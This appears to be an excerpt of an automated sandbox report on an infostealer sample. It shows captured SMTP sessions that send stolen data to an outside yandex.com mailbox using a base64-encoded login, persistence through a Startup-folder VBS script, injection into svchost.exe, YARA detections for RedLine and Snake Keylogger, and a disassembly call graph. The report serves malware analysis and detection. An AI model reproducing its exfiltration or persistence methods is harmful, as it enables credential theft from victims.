                                      Jul 25, 2024 03:34:59.589823961 CEST58749734118.69.190.131192.168.2.5354 Enter message, ending with "." on a line by itself
                                      Jul 25, 2024 03:34:59.590955019 CEST49734587192.168.2.5118.69.190.131.
                                      Jul 25, 2024 03:35:03.240335941 CEST58749734118.69.190.131192.168.2.5250 OK id=1sWnNj-0004Uj-DZ
                                      Jul 25, 2024 03:35:04.520241976 CEST49734587192.168.2.5118.69.190.131QUIT
                                      Jul 25, 2024 03:35:04.867557049 CEST58749734118.69.190.131192.168.2.5221 isphost2.fptdata.vn closing connection
                                      Jul 25, 2024 03:35:40.596565008 CEST58749750118.69.190.131192.168.2.5220 isphost2.fptdata.vn ESMTP Exim 4.94 Thu, 25 Jul 2024 08:35:40 +0700
                                      Jul 25, 2024 03:35:40.597001076 CEST49750587192.168.2.5118.69.190.131EHLO 124406
                                      Jul 25, 2024 03:35:40.947813988 CEST58749750118.69.190.131192.168.2.5250-isphost2.fptdata.vn Hello 124406 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-X_PIPE_CONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 25, 2024 03:35:40.948426008 CEST49750587192.168.2.5118.69.190.131AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
                                      Jul 25, 2024 03:35:41.298463106 CEST58749750118.69.190.131192.168.2.5334 UGFzc3dvcmQ6
                                      Jul 25, 2024 03:35:41.664545059 CEST58749750118.69.190.131192.168.2.5235 Authentication succeeded
                                      Jul 25, 2024 03:35:41.664872885 CEST49750587192.168.2.5118.69.190.131MAIL FROM:<sales-nguyen@vvtrade.vn>
                                      Jul 25, 2024 03:35:42.014945030 CEST58749750118.69.190.131192.168.2.5250 OK
                                      Jul 25, 2024 03:35:42.015125036 CEST49750587192.168.2.5118.69.190.131RCPT TO:<saleseuropower@yandex.com>
                                      Jul 25, 2024 03:35:42.515909910 CEST58749750118.69.190.131192.168.2.5250 Accepted
                                      Jul 25, 2024 03:35:42.516088963 CEST49750587192.168.2.5118.69.190.131DATA
                                      Jul 25, 2024 03:35:42.866134882 CEST58749750118.69.190.131192.168.2.5354 Enter message, ending with "." on a line by itself
                                      Jul 25, 2024 03:35:42.866959095 CEST49750587192.168.2.5118.69.190.131.
                                      Jul 25, 2024 03:35:49.490308046 CEST58749750118.69.190.131192.168.2.5250 OK id=1sWnOQ-0004Z2-MQ
                                      Jul 25, 2024 03:35:50.364670038 CEST49750587192.168.2.5118.69.190.131QUIT
                                      Jul 25, 2024 03:35:50.715406895 CEST58749750118.69.190.131192.168.2.5221 isphost2.fptdata.vn closing connection

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:21:34:30
                                      Start date:24/07/2024
                                      Path:C:\Users\user\Desktop\DSD876543456780000.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xbf0000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:21:34:31
                                      Start date:24/07/2024
                                      Path:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xe60000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 38%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:21:34:33
                                      Start date:24/07/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xbe0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:21:34:45
                                      Start date:24/07/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
                                      Imagebase:0x7ff72e610000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:21:34:46
                                      Start date:24/07/2024
                                      Path:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
                                      Imagebase:0xe60000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:21:34:47
                                      Start date:24/07/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
                                      Imagebase:0xbe0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:49
                                        execution_graph 96466 c28402 96471 c281be 96466->96471 96469 c2842a 96472 c281ef try_get_first_available_module 96471->96472 96479 c28338 96472->96479 96486 c18e0b 40 API calls 2 library calls 96472->96486 96474 c283ee 96490 c227ec 26 API calls pre_c_initialization 96474->96490 96476 c28343 96476->96469 96483 c30984 96476->96483 96478 c2838c 96478->96479 96487 c18e0b 40 API calls 2 library calls 96478->96487 96479->96476 96489 c1f2d9 20 API calls _abort 96479->96489 96481 c283ab 96481->96479 96488 c18e0b 40 API calls 2 library calls 96481->96488 96491 c30081 96483->96491 96485 c3099f 96485->96469 96486->96478 96487->96481 96488->96479 96489->96474 96490->96476 96494 c3008d BuildCatchObjectHelperInternal 96491->96494 96492 c3009b 96549 c1f2d9 20 API calls _abort 96492->96549 96494->96492 96496 c300d4 96494->96496 96495 c300a0 96550 c227ec 26 API calls pre_c_initialization 96495->96550 96502 c3065b 96496->96502 96501 c300aa __wsopen_s 96501->96485 96552 c3042f 96502->96552 96505 c306a6 96570 c25221 96505->96570 96506 c3068d 96584 c1f2c6 20 API calls _abort 96506->96584 96509 c306ab 96511 c306b4 96509->96511 96512 c306cb 96509->96512 96510 c30692 96585 c1f2d9 20 API calls _abort 96510->96585 96586 c1f2c6 20 API calls _abort 96511->96586 96583 c3039a CreateFileW 96512->96583 96516 c306b9 96587 c1f2d9 20 API calls _abort 96516->96587 96518 c30781 GetFileType 96519 c307d3 96518->96519 96520 c3078c GetLastError 96518->96520 96592 c2516a 21 API calls 3 library calls 96519->96592 96590 c1f2a3 20 API calls 2 library calls 96520->96590 96521 c30756 GetLastError 96589 c1f2a3 20 API calls 2 library calls 96521->96589 96524 c30704 96524->96518 96524->96521 96588 c3039a CreateFileW 96524->96588 96525 c3079a CloseHandle 96525->96510 96529 c307c3 96525->96529 96528 c30749 96528->96518 96528->96521 96591 c1f2d9 20 API calls _abort 96529->96591 96531 c30840 96537 c3086d 96531->96537 96594 c3014d 72 API calls 4 library calls 96531->96594 96532 c307f4 96532->96531 96593 c305ab 72 API calls 4 library calls 96532->96593 96533 c307c8 96533->96510 96536 c30866 96536->96537 96538 c3087e 96536->96538 96595 c286ae 96537->96595 96540 c300f8 96538->96540 96541 c308fc CloseHandle 96538->96541 96551 c30121 LeaveCriticalSection __wsopen_s 96540->96551 96610 c3039a CreateFileW 96541->96610 96543 c30927 96544 c3095d 96543->96544 96545 c30931 GetLastError 96543->96545 96544->96540 96611 c1f2a3 20 API calls 2 library calls 96545->96611 96547 c3093d 96612 c25333 21 API calls 3 library calls 96547->96612 96549->96495 96550->96501 96551->96501 96553 c30450 96552->96553 96554 c3046a 96552->96554 96553->96554 96620 c1f2d9 20 API calls _abort 96553->96620 96613 c303bf 96554->96613 96557 c3045f 96621 c227ec 26 API calls pre_c_initialization 96557->96621 96559 c304a2 96560 c304d1 96559->96560 96622 c1f2d9 20 API calls _abort 96559->96622 96567 c30524 96560->96567 96624 c1d70d 26 API calls 2 library calls 96560->96624 96563 c3051f 96565 c3059e 96563->96565 96563->96567 96564 c304c6 96623 c227ec 26 API calls pre_c_initialization 96564->96623 96625 c227fc 11 API calls _abort 96565->96625 96567->96505 96567->96506 96569 c305aa 96571 c2522d BuildCatchObjectHelperInternal 96570->96571 96628 c22f5e EnterCriticalSection 96571->96628 96573 c25234 96575 c25259 96573->96575 96579 c252c7 EnterCriticalSection 96573->96579 96582 c2527b 96573->96582 96632 c25000 96575->96632 96578 c252a4 __wsopen_s 96578->96509 96581 c252d4 LeaveCriticalSection 96579->96581 96579->96582 96581->96573 96629 c2532a 96582->96629 96583->96524 96584->96510 96585->96540 96586->96516 96587->96510 96588->96528 96589->96510 96590->96525 96591->96533 96592->96532 96593->96531 96594->96536 96658 c253c4 96595->96658 96597 c286c4 96671 c25333 21 API calls 3 library calls 96597->96671 96598 c286be 96598->96597 96600 c286f6 96598->96600 96603 c253c4 __wsopen_s 26 API calls 96598->96603 96600->96597 96601 c253c4 __wsopen_s 26 API calls 96600->96601 96604 c28702 FindCloseChangeNotification 96601->96604 96602 c2871c 96605 c2873e 96602->96605 96672 c1f2a3 20 API calls 2 library calls 96602->96672 96606 c286ed 96603->96606 96604->96597 96607 c2870e GetLastError 96604->96607 96605->96540 96609 c253c4 __wsopen_s 26 API calls 96606->96609 96607->96597 96609->96600 96610->96543 96611->96547 96612->96544 96615 c303d7 96613->96615 96614 c303f2 96614->96559 96615->96614 96626 c1f2d9 20 API calls _abort 96615->96626 96617 c30416 96627 c227ec 26 API calls pre_c_initialization 96617->96627 96619 c30421 96619->96559 96620->96557 96621->96554 96622->96564 96623->96560 96624->96563 96625->96569 96626->96617 96627->96619 96628->96573 96640 c22fa6 LeaveCriticalSection 96629->96640 96631 c25331 96631->96578 96641 c24c7d 96632->96641 96634 c2501f 96649 c229c8 96634->96649 96635 c25012 96635->96634 96648 c23405 11 API calls 2 library calls 96635->96648 96638 c25071 96638->96582 96639 c25147 EnterCriticalSection 96638->96639 96639->96582 96640->96631 96646 c24c8a _abort 96641->96646 96642 c24cca 96656 c1f2d9 20 API calls _abort 96642->96656 96643 c24cb5 RtlAllocateHeap 96644 c24cc8 96643->96644 96643->96646 96644->96635 96646->96642 96646->96643 96655 c14ead 7 API calls 2 library calls 96646->96655 96648->96635 96650 c229d3 RtlFreeHeap 96649->96650 96651 c229fc _free 96649->96651 96650->96651 96652 c229e8 96650->96652 96651->96638 96657 c1f2d9 20 API calls _abort 96652->96657 96654 c229ee GetLastError 96654->96651 96655->96646 96656->96644 96657->96654 96659 c253d1 96658->96659 96660 c253e6 96658->96660 96673 c1f2c6 20 API calls _abort 96659->96673 96666 c2540b 96660->96666 96675 c1f2c6 20 API calls _abort 96660->96675 96663 c253d6 96674 c1f2d9 20 API calls _abort 96663->96674 96664 c25416 96676 c1f2d9 20 API calls _abort 96664->96676 96666->96598 96668 c253de 96668->96598 96669 c2541e 96677 c227ec 26 API calls pre_c_initialization 96669->96677 96671->96602 96672->96605 96673->96663 96674->96668 96675->96664 96676->96669 96677->96668 96678 bff7bf 96679 bffcb6 96678->96679 96680 bff7d3 96678->96680 96781 bfaceb 23 API calls messages 96679->96781 96681 bffcc2 96680->96681 96713 c0fddb 96680->96713 96782 bfaceb 23 API calls messages 96681->96782 96685 bff7e5 96685->96681 96686 bff83e 96685->96686 96687 bffd3d 96685->96687 96711 bfed9d messages 96686->96711 96723 c01310 96686->96723 96783 c61155 22 API calls 96687->96783 96691 c0fddb 22 API calls 96709 bfec76 messages 96691->96709 96692 bffef7 96697 bfa8c7 22 API calls 96692->96697 96692->96711 96694 c44600 96694->96711 96784 bfa8c7 96694->96784 96695 c44b0b 96789 c6359c 82 API calls __wsopen_s 96695->96789 96696 bfa8c7 22 API calls 96696->96709 96697->96711 96702 bffbe3 96704 c44bdc 96702->96704 96702->96711 96712 bff3ae messages 96702->96712 96703 bfa961 22 API calls 96703->96709 96790 c6359c 82 API calls __wsopen_s 96704->96790 96706 c10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96706->96709 96707 c44beb 96791 c6359c 82 API calls __wsopen_s 96707->96791 96708 c100a3 29 API calls pre_c_initialization 96708->96709 96709->96691 96709->96692 96709->96694 96709->96695 96709->96696 96709->96702 96709->96703 96709->96706 96709->96707 96709->96708 96710 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96709->96710 96709->96711 96709->96712 96779 c001e0 256 API calls 2 library calls 96709->96779 96780 c006a0 41 API calls messages 96709->96780 96710->96709 96712->96711 96788 c6359c 82 API calls __wsopen_s 96712->96788 96715 c0fde0 96713->96715 96716 c0fdfa 96715->96716 96719 c0fdfc 96715->96719 96792 c1ea0c 96715->96792 96799 c14ead 7 API calls 2 library calls 96715->96799 96716->96685 96718 c1066d 96801 c132a4 RaiseException 96718->96801 96719->96718 96800 c132a4 RaiseException 96719->96800 96722 c1068a 96722->96685 96724 c017b0 96723->96724 96725 c01376 96723->96725 97067 c10242 5 API calls __Init_thread_wait 96724->97067 96726 c46331 96725->96726 96804 c01940 96725->96804 97078 c7709c 256 API calls 96726->97078 96729 c017ba 96733 c017fb 96729->96733 97068 bf9cb3 96729->97068 96731 c4633d 96731->96709 96737 c46346 96733->96737 96739 c0182c 96733->96739 96734 c01940 9 API calls 96736 c013b6 96734->96736 96736->96733 96738 c013ec 96736->96738 97079 c6359c 82 API calls __wsopen_s 96737->97079 96738->96737 96744 c01408 __fread_nolock 96738->96744 97075 bfaceb 23 API calls messages 96739->97075 96742 c01839 97076 c0d217 256 API calls 96742->97076 96743 c017d4 97074 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96743->97074 96744->96742 96747 c4636e 96744->96747 96755 c0fddb 22 API calls 96744->96755 96763 c0152f 96744->96763 96765 c463b2 96744->96765 96768 c015c7 messages 96744->96768 96814 bfec40 96744->96814 97056 c0fe0b 96744->97056 97080 c6359c 82 API calls __wsopen_s 96747->97080 96749 c463d1 97082 c75745 54 API calls _wcslen 96749->97082 96750 c0153c 96751 c01940 9 API calls 96750->96751 96754 c01549 96751->96754 96752 c01872 96752->96726 97077 c0faeb 23 API calls 96752->97077 96758 c01940 9 API calls 96754->96758 96754->96768 96755->96744 96762 c01563 96758->96762 96759 c0171d 96759->96709 96762->96768 96770 bfa8c7 22 API calls 96762->96770 96763->96749 96763->96750 97081 c6359c 82 API calls __wsopen_s 96765->97081 96766 c01940 9 API calls 96766->96768 96767 c0167b messages 96767->96759 97066 c0ce17 22 API calls messages 96767->97066 96768->96752 96768->96766 96768->96767 96838 c6744a 96768->96838 96895 c5d4ce 96768->96895 96898 c7959f 96768->96898 96901 c7958b 96768->96901 96904 c66ef1 96768->96904 96984 c0effa 96768->96984 97041 c6f0ec 96768->97041 97050 bf4f39 96768->97050 97083 c6359c 82 API calls __wsopen_s 96768->97083 96770->96768 96779->96709 96780->96709 96781->96681 96782->96687 96783->96711 96785 bfa8ea __fread_nolock 96784->96785 96786 bfa8db 96784->96786 96785->96711 96786->96785 96787 c0fe0b 22 API calls 96786->96787 96787->96785 96788->96711 96789->96711 96790->96707 96791->96711 96797 c23820 _abort 96792->96797 96793 c2385e 96803 c1f2d9 20 API calls _abort 96793->96803 96795 c23849 RtlAllocateHeap 96796 c2385c 96795->96796 96795->96797 96796->96715 96797->96793 96797->96795 96802 c14ead 7 API calls 2 library calls 96797->96802 96799->96715 96800->96718 96801->96722 96802->96797 96803->96796 96805 c01981 96804->96805 96810 c0195d 96804->96810 97084 c10242 5 API calls __Init_thread_wait 96805->97084 96808 c08727 96813 c013a0 96808->96813 97087 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96808->97087 96809 c0198b 96809->96810 97085 c101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96809->97085 96810->96813 97086 c10242 5 API calls __Init_thread_wait 96810->97086 96813->96734 96835 bfec76 messages 96814->96835 96815 c100a3 29 API calls pre_c_initialization 96815->96835 96816 c0fddb 22 API calls 96816->96835 96818 bffef7 96823 bfa8c7 22 API calls 96818->96823 96831 bfed9d messages 96818->96831 96820 c44600 96826 bfa8c7 22 API calls 96820->96826 96820->96831 96821 c44b0b 97091 c6359c 82 API calls __wsopen_s 96821->97091 96822 bfa8c7 22 API calls 96822->96835 96823->96831 96826->96831 96828 c10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96828->96835 96829 bffbe3 96829->96831 96832 c44bdc 96829->96832 96837 bff3ae messages 96829->96837 96830 bfa961 22 API calls 96830->96835 96831->96744 97092 c6359c 82 API calls __wsopen_s 96832->97092 96834 c44beb 97093 c6359c 82 API calls __wsopen_s 96834->97093 96835->96815 96835->96816 96835->96818 96835->96820 96835->96821 96835->96822 